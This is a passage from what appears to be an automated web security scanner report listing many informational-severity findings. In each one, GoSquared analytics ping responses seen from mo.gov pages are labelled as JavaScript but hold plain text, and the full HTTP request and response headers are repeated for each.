GET /ping/GSN-237422-W/1496610374/1445638221/0.9022978853899986/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:32:48 GMT
Expires: Tue, 05 Apr 2011 11:32:48
Server: nginx/0.8.54
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.119. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.9131813035346568/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.9131813035346568/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.9131813035346568/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:57:42 GMT
Expires: Tue, 05 Apr 2011 11:57:42
Server: nginx/0.8.54
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.120. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.9280000494327396/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.9280000494327396/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.9280000494327396/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:46:05 GMT
Expires: Tue, 05 Apr 2011 11:46:04
Server: nginx/0.8.54
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.121. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.9323878902941942/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.9323878902941942/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.9323878902941942/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:35:34 GMT
Expires: Tue, 05 Apr 2011 11:35:34
Server: nginx/0.8.54
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.122. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.9361629660706967/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.9361629660706967/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.9361629660706967/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:25:03 GMT
Expires: Tue, 05 Apr 2011 11:25:03
Server: nginx/0.8.54
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.123. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.9456879969220608/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.9456879969220608/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.9456879969220608/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:34:28 GMT
Expires: Tue, 05 Apr 2011 11:34:28
Server: nginx/0.8.54
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.124. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.9502052108291537/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.9502052108291537/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.9502052108291537/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:41:06 GMT
Expires: Tue, 05 Apr 2011 11:41:06
Server: nginx/0.8.54
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.125. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.9559315296355635/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.9559315296355635/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.9559315296355635/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:53:16 GMT
Expires: Tue, 05 Apr 2011 11:53:16
Server: nginx/0.8.54
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.126. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.9581880448386073/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.9581880448386073/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.9581880448386073/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:59:23 GMT
Expires: Tue, 05 Apr 2011 11:59:23
Server: nginx/0.8.54
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.127. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.9663452641107142/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.9663452641107142/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.9663452641107142/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:31:09 GMT
Expires: Tue, 05 Apr 2011 11:31:09
Server: nginx/0.8.54
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.128. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.968449151609093/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.968449151609093/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.968449151609093/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:44:08 GMT
Expires: Tue, 05 Apr 2011 11:44:08
Server: nginx/0.8.54
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.129. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.9736038320697844/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.9736038320697844/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.9736038320697844/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:28:56 GMT
Expires: Tue, 05 Apr 2011 11:28:56
Server: nginx/0.8.54
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.130. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.9872054078150541/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.9872054078150541/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.9872054078150541/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:36:07 GMT
Expires: Tue, 05 Apr 2011 11:36:07
Server: nginx/0.8.54
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.131. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.9883057198021561/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.9883057198021561/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.9883057198021561/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:28:22 GMT
Expires: Tue, 05 Apr 2011 11:28:22
Server: nginx/0.8.54
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.132. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.07331018731929362/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1664119246/0.07331018731929362/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1664119246/0.07331018731929362/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:22:14 GMT
Expires: Tue, 05 Apr 2011 11:22:14
Server: nginx/0.8.54
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.133. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.12472099298611283/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1664119246/0.12472099298611283/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1664119246/0.12472099298611283/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:21:41 GMT
Expires: Tue, 05 Apr 2011 11:21:41
Server: nginx/0.8.54
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.134. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.18714607320725918/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1664119246/0.18714607320725918/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1664119246/0.18714607320725918/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:14:41 GMT
Expires: Tue, 05 Apr 2011 11:14:41
Server: nginx/0.8.54
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.135. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.1872362329158932/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1664119246/0.1872362329158932/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1664119246/0.1872362329158932/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:16:23 GMT
Expires: Tue, 05 Apr 2011 11:16:23
Server: nginx/0.8.54
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.136. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.2141191172413528/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1664119246/0.2141191172413528/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1664119246/0.2141191172413528/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:21:07 GMT
Expires: Tue, 05 Apr 2011 11:21:07
Server: nginx/0.8.54
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.137. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.21521809720434248/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1664119246/0.21521809720434248/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1664119246/0.21521809720434248/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:23:04 GMT
Expires: Tue, 05 Apr 2011 11:23:04
Server: nginx/0.8.54
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.138. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.21795565215870738/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1664119246/0.21795565215870738/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1664119246/0.21795565215870738/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:15:49 GMT
Expires: Tue, 05 Apr 2011 11:15:49
Server: nginx/0.8.54
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.139. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.22715646773576736/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1664119246/0.22715646773576736/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1664119246/0.22715646773576736/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:20:34 GMT
Expires: Tue, 05 Apr 2011 11:20:34
Server: nginx/0.8.54
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.140. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.23163565923459828/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1664119246/0.23163565923459828/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1664119246/0.23163565923459828/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:19:27 GMT
Expires: Tue, 05 Apr 2011 11:19:27
Server: nginx/0.8.54
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.141. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.30029481556266546/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1664119246/0.30029481556266546/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1664119246/0.30029481556266546/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:20:01 GMT
Expires: Tue, 05 Apr 2011 11:20:01
Server: nginx/0.8.54
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.142. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.33089457359164953/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1664119246/0.33089457359164953/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1664119246/0.33089457359164953/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:23:21 GMT
Expires: Tue, 05 Apr 2011 11:23:21
Server: nginx/0.8.54
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.143. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.3843667053151876/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1664119246/0.3843667053151876/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1664119246/0.3843667053151876/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:19:43 GMT
Expires: Tue, 05 Apr 2011 11:19:43
Server: nginx/0.8.54
